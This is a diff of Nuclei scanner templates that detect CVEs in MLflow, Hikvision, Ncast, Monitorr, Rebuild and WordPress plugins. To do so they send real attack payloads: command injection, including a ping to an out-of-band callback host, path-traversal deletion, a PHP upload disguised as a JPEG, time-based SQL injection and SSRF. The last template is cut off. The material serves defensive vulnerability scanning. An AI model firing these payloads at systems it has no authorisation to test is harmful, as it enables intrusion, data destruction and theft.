|
condition: and
|
||||||
# digest: 490a004630440220711084c66864d0f0ed8c49720ebfc388d1902517733600bac42c326ca8ffe14702206f9bb4ad5b87af58606cf3c4970f194074fc852d625138497b225c64f7b89d6a:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502210093bf3e2e6772a217d1c09ef23feff29a86dcb2db0c7824b6ca669c673564321a02202f3ace02b3e57883eb764701f4c31c4a1cb5ba8cd42ea02ff8a8e23b05c547f9:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,62 @@
|
||||||
|
id: CVE-2023-6831
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: mlflow - Path Traversal
|
||||||
|
author: byObin
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
|
||||||
|
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
|
||||||
|
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
|
||||||
|
remediation: |
|
||||||
|
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
|
||||||
|
cvss-score: 8.1
|
||||||
|
cve-id: CVE-2023-6831
|
||||||
|
cwe-id: CWE-22
|
||||||
|
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
|
||||||
|
epss-score: 0.00046
|
||||||
|
epss-percentile: 0.12693
|
||||||
|
metadata:
|
||||||
|
vendor: lfprojects
|
||||||
|
product: mlflow
|
||||||
|
shodan-query: "http.title:\"mlflow\""
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
{{randstr}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header_2
|
||||||
|
words:
|
||||||
|
- "Content-Type: application/json"
|
||||||
|
- "Server: gunicorn"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "{}"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
||||||
|
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,56 @@
|
||||||
|
id: CVE-2023-6895
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision Intercom Broadcasting System - Command Execution
|
||||||
|
author: archer
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
|
||||||
|
reference:
|
||||||
|
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
|
||||||
|
- https://vuldb.com/?ctiid.248254
|
||||||
|
- https://vuldb.com/?id.248254
|
||||||
|
- https://github.com/Marco-zcl/POC
|
||||||
|
- https://github.com/d4n-sec/d4n-sec.github.io
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-6895
|
||||||
|
cwe-id: CWE-78
|
||||||
|
epss-score: 0.0008
|
||||||
|
epss-percentile: 0.32716
|
||||||
|
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: hikvision
|
||||||
|
product: intercom_broadcast_system
|
||||||
|
fofa-query: icon_hash="-1830859634"
|
||||||
|
tags: cve,cve2023,rce,hikvision
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /php/ping.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
|
||||||
|
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "TTL="
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
|
|
@ -6,24 +6,25 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
|
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
|
||||||
impact: |
|
|
||||||
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
|
|
||||||
remediation: |
|
|
||||||
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
|
|
||||||
reference:
|
reference:
|
||||||
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
|
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
|
||||||
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
|
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
|
||||||
|
impact: |
|
||||||
|
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
|
||||||
|
remediation: |
|
||||||
|
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
||||||
cvss-score: 9.3
|
cvss-score: 9.3
|
||||||
cve-id: CVE-2023-6909
|
cve-id: CVE-2023-6909
|
||||||
cwe-id: CWE-29
|
cwe-id: CWE-29
|
||||||
metadata:
|
metadata:
|
||||||
|
max-request: 5
|
||||||
verified: true
|
verified: true
|
||||||
vendor: lfprojects
|
vendor: lfprojects
|
||||||
product: mlflow
|
product: mlflow
|
||||||
shodan-query: http.title:"mlflow"
|
shodan-query: "http.title:\"mlflow\""
|
||||||
tags: cve,cve2023,mlflow,lfi
|
tags: cve,cve2023,mlflow,lfi
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -90,4 +91,4 @@ http:
|
||||||
json:
|
json:
|
||||||
- '.run.info.run_id'
|
- '.run.info.run_id'
|
||||||
internal: true
|
internal: true
|
||||||
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2024-0305
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ncast busiFacade - Remote Command Execution
|
||||||
|
author: BMCel
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
|
||||||
|
impact: |
|
||||||
|
Allows remote attackers to execute arbitrary code on the affected system.
|
||||||
|
reference:
|
||||||
|
- https://cxsecurity.com/cveshow/CVE-2024-0305
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-0305
|
||||||
|
- https://vuldb.com/?id.249872
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2024-0305
|
||||||
|
epss-score: 0.00064
|
||||||
|
epss-percentile: 0.2597
|
||||||
|
cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
vendor: ncast_project
|
||||||
|
product: ncast
|
||||||
|
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
|
||||||
|
zoomeye-query: title:"高清智能录播系统"
|
||||||
|
tags: cve,cve2024,ncast,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /classes/common/busiFacade.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
|
||||||
|
- "#str"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4a0a0047304502207fea590b5f6bf722200ca68b8832b7c0d3a272c55c2c93cc238fef99772514d0022100b0ca7e5f0234813a63935fa5767fe9d688e5e741e2cd658b5cb02f79d241a220:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,70 @@
|
||||||
|
id: CVE-2024-0713
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Monitorr Services Configuration - Arbitrary File Upload
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
|
||||||
|
reference:
|
||||||
|
- https://github.com/Tropinene/Yscanner
|
||||||
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-0713
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2024-0713
|
||||||
|
cwe-id: CWE-434
|
||||||
|
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
|
||||||
|
epss-score: 0.00061
|
||||||
|
epss-percentile: 0.2356
|
||||||
|
metadata:
|
||||||
|
vendor: monitorr
|
||||||
|
product: monitorr
|
||||||
|
verified: true
|
||||||
|
fofa-query: "icon_hash=\"-211006074\""
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2024,file-upload,intrusive,monitorr
|
||||||
|
|
||||||
|
variables:
|
||||||
|
file: "{{to_lower(rand_text_alpha(5))}}"
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /assets/php/upload.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn
|
||||||
|
|
||||||
|
------WebKitFormBoundaryaquxwjsn
|
||||||
|
Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}
|
||||||
|
------WebKitFormBoundaryaquxwjsn--
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- "has been uploaded to:"
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /assets/data/usrimg/{{file}}.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "atfersotg"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2024-1021
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
|
||||||
|
author: BMCel
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
|
||||||
|
reference:
|
||||||
|
- https://github.com/getrebuild/rebuild
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
||||||
|
impact: |
|
||||||
|
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
||||||
|
remediation: |
|
||||||
|
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
fofa-query: "icon_hash=\"871154672\""
|
||||||
|
tags: cve2024,cve,rebuild,ssrf
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
|
||||||
|
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950
|
|
@ -6,14 +6,14 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
|
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
|
||||||
impact: |
|
|
||||||
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
|
||||||
remediation: |
|
|
||||||
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
|
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2024-02
|
- https://www.tenable.com/security/research/tra-2024-02
|
||||||
- https://wordpress.org/plugins/html5-video-player
|
- https://wordpress.org/plugins/html5-video-player
|
||||||
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
|
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
|
||||||
|
impact: |
|
||||||
|
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
||||||
|
remediation: |
|
||||||
|
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||||
cvss-score: 8.6
|
cvss-score: 8.6
|
||||||
|
@ -21,7 +21,8 @@ info:
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
fofa-query: '"wordpress" && body="html5-video-player"'
|
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
|
||||||
|
max-request: 1
|
||||||
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
|
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -36,4 +37,4 @@ http:
|
||||||
- 'contains(header, "application/json")'
|
- 'contains(header, "application/json")'
|
||||||
- 'contains_all(body, "created_at", "video_id")'
|
- 'contains_all(body, "created_at", "video_id")'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2024-1071
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection
|
||||||
|
author: DhiyaneshDK,iamnooob
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||||
|
remediation: Fixed in 2.8.3
|
||||||
|
reference:
|
||||||
|
- https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
|
||||||
|
- https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2024-1071
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
framework: wordpress
|
||||||
|
publicwww-query: "/wp-content/plugins/ultimate-member/"
|
||||||
|
zoomeye-query: app:"WordPress Ultimate Member Plugin"
|
||||||
|
fofa-query: body="/wp-content/plugins/ultimate-member"
|
||||||
|
tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /?p=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_2>=5'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains_all(body_2, "current_page", "total_pages")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"nonce":"([0-9a-z]+)"'
|
||||||
|
internal: true
|
||||||
|
# digest: 4b0a00483046022100cbbf2eef879ba4fd92a1ea6d44bcd473dbc968afabbde5391d5969feba1bc4c7022100eb9710892e9d92fa4d14b16004b74b743d42abe45900eeef50caf239ea91aaea:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2024-1208
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
|
||||||
|
remediation: Fixed in 4.10.3
|
||||||
|
reference:
|
||||||
|
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1208
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2024-1208
|
||||||
|
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
vendor: learndash
|
||||||
|
product: learndash
|
||||||
|
framework: wordpress
|
||||||
|
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
|
||||||
|
publicwww-query: "/wp-content/plugins/sfwd-lms"
|
||||||
|
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-json/wp/v2/sfwd-question"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"id":'
|
||||||
|
- '"question_type":'
|
||||||
|
- '"points_total":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a0046304402203916aaf1a8ee1aac0dd4cf38919e9f2e19085f8ccbbed45a47c932c1b491fb1302207bed484d250b4815723b4f03051d6f9f02504d362be0b2f60b4c99d8e8ff2ed3:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2024-1209
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
|
||||||
|
remediation: Fixed in 4.10.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/
|
||||||
|
- https://github.com/karlemilnikka/CVE-2024-1209
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1209
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2024-1209
|
||||||
|
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
vendor: learndash
|
||||||
|
product: learndash
|
||||||
|
framework: wordpress
|
||||||
|
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
|
||||||
|
publicwww-query: "/wp-content/plugins/sfwd-lms"
|
||||||
|
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"id":'
|
||||||
|
- 'slug":"assignment'
|
||||||
|
- '.pdf"'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4a0a00473045022033bf2ad75dd487b69924c9295b5366eb34cca9066811d2354a8a4e034a2e6089022100f1f2ee39c0db1395ace5d071d86ed18c10d824d16cc00024087e0b9bb1eb8a37:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2024-1210
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.
|
||||||
|
remediation: Fixed in 4.10.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/
|
||||||
|
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1210
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2024-1210
|
||||||
|
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
vendor: learndash
|
||||||
